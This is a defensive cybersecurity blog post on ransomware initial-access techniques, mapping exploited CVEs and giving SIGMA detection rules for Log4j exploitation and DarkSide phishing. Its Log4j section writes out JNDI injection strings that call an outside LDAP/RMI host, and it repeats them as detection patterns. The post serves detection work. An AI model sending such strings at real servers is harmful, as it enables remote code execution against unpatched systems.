Ransomware Prevention and Detection in the Initial Phase of Attack Lifecycle from the Defender’s Perspective

Keep up to date with latest blog posts

Adopting a threat-centric defense approach is key to defense against ransomware. Prevention and detection of ransomware require cybersecurity professionals to understand the adversaries’ mindset.

The previous blogs on our ransomware blog series explained:

In this blog post, we explained the Initial Phase of the ransomware attack lifecycle and MITRE ATT&CK techniques used in this phase. 

Test your security controls against ransomware

The Initial Phase of Ransomware Attack Lifecycle

The Initial Phase is the first phase of ransomware attacks. In this phase, ransomware attackers look for a way into the target network. As explained above, attackers use techniques categorized under Reconnaissance, Resource Development, and Initial Access tactics of the MITRE ATT&CK framework. ATT&CK techniques from Reconnaissance and Resource Development tactics are not in the scope of prevention and detection efforts because these techniques are usually legitimate and harmless. Therefore, we should focus on the Initial Access tactic techniques to prevent and detect ransomware attacks. Let’s look into preventing and detecting two of the most abused Initial Access techniques.

Technique 1: MITRE ATT&CK T1190 Exploit Public Facing Application

T1190 Exploit Public Facing Application technique describes an attacker's attempt to take advantage of a weakness in public-facing assets. Ransomware threat actors also abuse weak points in the target network’s perimeter. These weak points can be an outdated endpoint device, misconfigured file sharing service, or a vulnerable web application. Real-life examples of ransomware exploiting public-facing assets are given below.

Vulnerable Asset

Vulnerability

Ransomware Group

Web servers

CVE-2019-2725 in Oracle WebLogic Server 

REvil (Sodinokibi)

Mail servers

CVE-2021-34473  in Microsoft Exchange Server

Conti, Ranzy Locker

Application Delivery Controller Hardware

CVE-2019-19781 in Citrix ADC and Gateway 

Nefilim

VPN software

CVE-2021-20016 in SonicWall SMA100 SSL VPN

Darkside

Virtualization software

CVE-2020-3992 and CVE-2019-5544 in VMware ESXi

Darkside

Utility

CVE-2021-34527 in Windows Print Spooler a.k.a. PrintNightmare

Magniber

Identifying vulnerabilities in your assets is the first step of preventing ransomware attacks using the Exploit Public Facing Application technique. Vulnerability scanners are helpful tools for finding vulnerable applications and devices in the system. After identifying vulnerable assets, applying relevant patches should not be delayed. You can also utilize Firewalls, Intrusion Prevention Systems (IPS), and Web Application Firewall (WAF) to filter out malicious input of adversaries. 

Apache Log4j is a popular software library used by numerous public-facing applications. In December 2021, a remote code execution vulnerability in Log4j was discovered, and adversaries exploited this vulnerability to gain initial access to target systems. Let’s inspect the exploitation step by step and write a detection rule.

            ${jndi:ldap://example.com}

             ${jndi:rmi://example.com}

Figure 2: Malicious JNDI request example

Adversaries exploit the Log4j vulnerability by initiating a log generation with a malicious JNDI request. This request can be sent in the user-agent, referrer header, or URI field of an HTTP request. Many malicious JNDI requests used in Log4j attacks share the specific patterns shown in Figure 2.  We can write a detection rule using these unique patterns and block the attacker’s attempts.

logsource:
  category: webserver
detection:
  selection1:
      cs-User-Agent|contains:
        - '${jndi:ldap:/'
        - '${jndi:rmi:/'
        - '${base64:JHtqbmRp'
  selection2:
     cs-uri|contains:
        - '${jndi:ldap:/'
        - '${jndi:rmi:/'
        - '${base64:JHtqbmRp'
  selection3:
      cs-referer|contains:
        - '${jndi:ldap:/'
        - '${jndi:rmi:/'
        - '${base64:JHtqbmRp'
  condition: 1 of selection*

Figure 3: Example SIGMA rule for detecting Log4j vulnerability exploitation

The SIGMA rule given in Figure 3 checks the “webserver” logs for unique patterns used in malicious JNDI requests to detect Log4j attacks. This SIGMA rule can be converted to vendor-specific detection rules and implemented into various security controls.

Since these malicious requests are web application attacks, Web Application Firewalls can prevent them. Intrusion Prevention Systems can also block these attacks; however, they are not as capable as Web Application Firewalls at preventing application-layer attacks.

Technique 2: MITRE ATT&CK T1566 Phishing

Another widely used MITRE ATT&CK technique in the Initial Phase of ransomware attacks is T1566 Phishing. Especially, T1566.001 Spearphishing Attachment and T1566.002 Spearphishing Link sub-techniques are employed to deliver malware by ransomware threat actors. 

Attackers send legitimate-looking emails to trick users into opening malicious links or attachments in the email. When the phished user opens these malicious links or attachments, it establishes remote access for the attacker. Security controls like Secure Email Gateways and Secure Web Gateways can prevent phishing attacks. These security controls mainly inspect email and check the legitimacy of the attachments and links before it reaches users. If the email passes the inspection, it is allowed to the user's inbox. However, this method is not always reliable, and some malicious emails may pass the inspection.

Many ransomware variants abuse Microsoft Office Remote Code Execution vulnerabilities given below. For example, the DarkSide ransomware group sends malicious Office documents to abuse these vulnerabilities via phishing emails. 

Description

CVE Number

CVSS Score

Microsoft Office RCE Vulnerabilities

CVE-2017-0261

7.8 (High)

CVE-2017-0262

7.8 (High)

Let’s give an example from the DarkSide ransomware group’s playbook and write a detection rule for it.  DarkSide sends a Microsoft Office document with malicious macros as an attachment in phishing emails. When a user opens the attachment, the macro in the Word document renders an EPS image using Microsoft Filter Loader and creates a malicious payload. Since it is uncommon for Word to start Microsoft Filter Loader, we can use this aspect of the attack to detect DarkSide activity. 

logsource:
  category: process_creation
  product: windows
detection:
  selection:
    ParentImage|endswith: '\WINWORD.EXE'
    Image|contains: '\FLTLDR.exe'
  condition: selection

Figure 4: Example SIGMA rule to detect abuse of Microsoft Filter Loader

The SIGMA rule given in Figure 4 checks the “Process Creation” logs for unique patterns used in DarkSide phishing attacks. If the Office Word process calls Microsoft Filter Loader, this SIGMA rule creates a detection alert for DarkSide activity. This SIGMA rule can be converted to vendor-specific detection rules and implemented into various security controls.

On a final note, in addition to technical precautions, user awareness plays a vital role against phishing attacks. Regular user training and phishing drills are great ways to boost user awareness against phishing.

Ransomware Detection in Early Phases of the Attack Lifecycle Course

Subscribe

Keep up to date with latest blog posts